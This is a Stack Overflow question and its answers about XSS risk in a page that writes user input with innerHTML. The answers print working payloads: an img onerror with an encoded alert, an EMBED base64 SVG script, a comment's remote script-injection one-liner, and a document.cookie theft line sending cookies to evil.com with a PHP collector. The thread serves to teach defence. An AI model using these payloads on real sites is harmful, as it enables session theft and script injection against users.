# security risk of not validated input reflected in page

Tags: javascript, html, security, xss

I'm trying to figure out how problematic the following code is, and what I can do about it. There are no GET requests, no dynamic urls (does a data url count?), I'm not using eval() anywhere etc. The only thing that I really know of, is that I'm supposed to escape special characters like <, > and & etc. But the pickle is that the examples I've seen that show why this is an important step in proof-of-concept demonstrations (where one might enter script tags and import code from a bad library or something equally sinister) are not working. So I am having difficulty witnessing the significance.

I'm doing the 2 things:

1. reflecting user input back into the page in some way
2. making available a file for download using user input

Question1: Is it unsafe? Not in general, but rather the specific code I have written. And if so:

Question2: Could I be shown at least one way the code I have below could be exploited in any modern browser in the latter half of 2018?

html:

```
<input id='myInput' value='bob'></input>
<button id='myButton'></button>
<p id='myOutput'></p>
```

javascript:

```
var buttonEl = document.getElementById('myButton');
buttonEl.addEventListener('click', function() {
 var input = document.getElementById('myInput').value;
 doSomethingThenExportAsTextFile(input);
});

function doSomethingThenExportAsTextFile(x) {
 document.getElementById('myOutput').innerHTML = x;
 var a = document.createElement('a');
 a.setAttribute('href', 'data:text/plain;charset=utf-8,' + encodeURIComponent(x));
 a.download = 'fileName.txt';
 document.body.appendChild(a);
 a.click();
 document.body.removeChild(a);
}
```

If I key in something like `<u>bob</u>` then as I would expect, the underlined name 'bob' appears in my p tag. If I replace `innerHTML` with `textContent` or `document.createTextNode()` then I don't have this problem. **Is that safe enough?**

I don't know how things were before, but if I type code inside script tags in the input, nothing happens (in chrome). **Is that something chrome is doing?** What can I do to see the effect of the complete absence of any security measures in the above code?

The downloaded text file tho, I'm assuming because of `encodeURIComponent()`, reads exactly what I typed.

**EDIT**

I regard the second half of this question as more important, since just about everything I have read about this topic suggests the code I have written is not safe code.

Furthermore, I would suggest that the solution presented here: [Is createTextNode completely safe from HTML injection & XSS?](https://stackoverflow.com/questions/11654555/is-createtextnode-completely-safe-from-html-injection-xss) is different than what I am looking for because the method of exploitation considered uses php, which is able to interrupt something like `document.createTextNode()`. That is not applicable to my case.

Comment: Possible duplicate of [Is createTextNode completely safe from HTML injection & XSS?](https://stackoverflow.com/questions/11654555/is-createtextnode-completely-safe-from-html-injection-xss)

Comment: I would say that the referenced question answers the first half of mine, since I feel pretty assured that if I capture user input on a page and reflect it back using `document.createTextNode(userInput)` all on the client-side, that I should be safe. But the answer's mechanism of exploitation uses php, which I'm not using in my program, and is ancillary to the question. Whereas in my question, part of what I'm looking for is a way to exploit my javascript program in its current form. And I think that Obsidian Age's answer below really does provide me with something new, using the onerror event.

Answer (score 1, accepted):

I'm afraid that `.innerHTML` is **not** suitable protection against XSS; anything that allows the user to output raw HTML to the DOM is susceptible to XSS. And this includes your above code.

For example, you could make use of the `onerror` attribute of `<img>` to force-load an embedded `<script>` by submitting the following into your `<input>`:

```
<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">
```

Or if you want to get really nasty, you can force-load the `<script>` tag inside an embedded `<svg>`
(thanks to `AllowScriptAccess`):

```
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIyMDAiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlhTUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
```

Both of the above will throw an 'XSS' alert in the latest versions of Chrome and Firefox.

`.textContent()` / `.createTextNode()` only accept raw **text** (no HTML), so are **safe** in this regard, assuming you don't have any server-side misconfigurations that allow the end-user to inject server-side code.

Comment: I tried `onerror=console.log("hi");` inside an img tag and it wrote to the console which I find pretty exciting. I'm glad you pointed this out to me. At any rate, I feel pretty good that if I get rid of `innerHTML` and use `document.createTextNode()` I should be safe given my current program. I will do a bit more reading on the matter but I think this is pretty much what I was looking for.

Comment: My knowledge isn't that sophisticated but the fact that I could do sthing like the following highlights how easily that not validated input can be: `onerror="(function(){var s = document.createElement('script'); s.src='someURL; document.body.appendChild(s);})()"` I just tried it out.

Answer (score 0):

In order to protect yourself from XSS attacks, you will need to correctly sanitize all input.

Any input coming from a PHP application and being reflected on a page should be sanitized using the `htmlspecialchars($input)` function. This will print the characters as text.

The current XSS you are showing us would be self XSS (as it is being completed using JavaScript and there is really no way an attacker could harm a user with this. It's still important to correctly sanitize it, one method of sanitizing code using JavaScript is to put it in `<xmp>` tags which will do more or less the same as the PHP function above. It's a simple way to sanitize using HTML. It should be noticed that use of these tags is obsolete now, but it does seem to still work in all browser I've tested it on.

As far as an example of XSS attacks go, there are really 2 major issues. The first is with persistent XSS, where an attack can be stored in the database and then reflected onto a page each time a user visits. Assuming you are using a JavaScript-only application (with no database), this cannot really be an issue for you. An issue which is pretty much unique to persistent XSS attacks is defacement of an entire page, so the malicious code would hide all content on the page (using JS/CSS) and then inject its own page source.

The biggest issue with XSS is session stealing. Again, in your case it's not a very big deal as you don't have a database and as such you likely don't have any sessions (cookies). Javascript can easily grab a user's cookies when they visit the page using `document.cookie`. Then all a malicious attacker would need to do is send that information to themselves. A simple method would be to create a website with a PHP file containing something like this:

```
<?php
//If ?cookies= param is set...
if(isset($_GET['cookies'])){
    //Save cookies as $cookies variable...
    $cookies = $_GET['cookies'];
    //From here we can save their cookies to the server.
}
?>
```

So the javascript payload they need to inject onto the page would be:
`window.location = "http://evil.com/cookiescript.php?cookies=" + document.cookie;`
Which will then redirect them to the attackers website (evil.com) and the PHP script we created above (cookiescript.php) and then set the value of the cookie parameter to the user's cookies for the site they are being redirected from.

Then an attacker can copy their cookies to his browser, visit the website and hijack the user's session.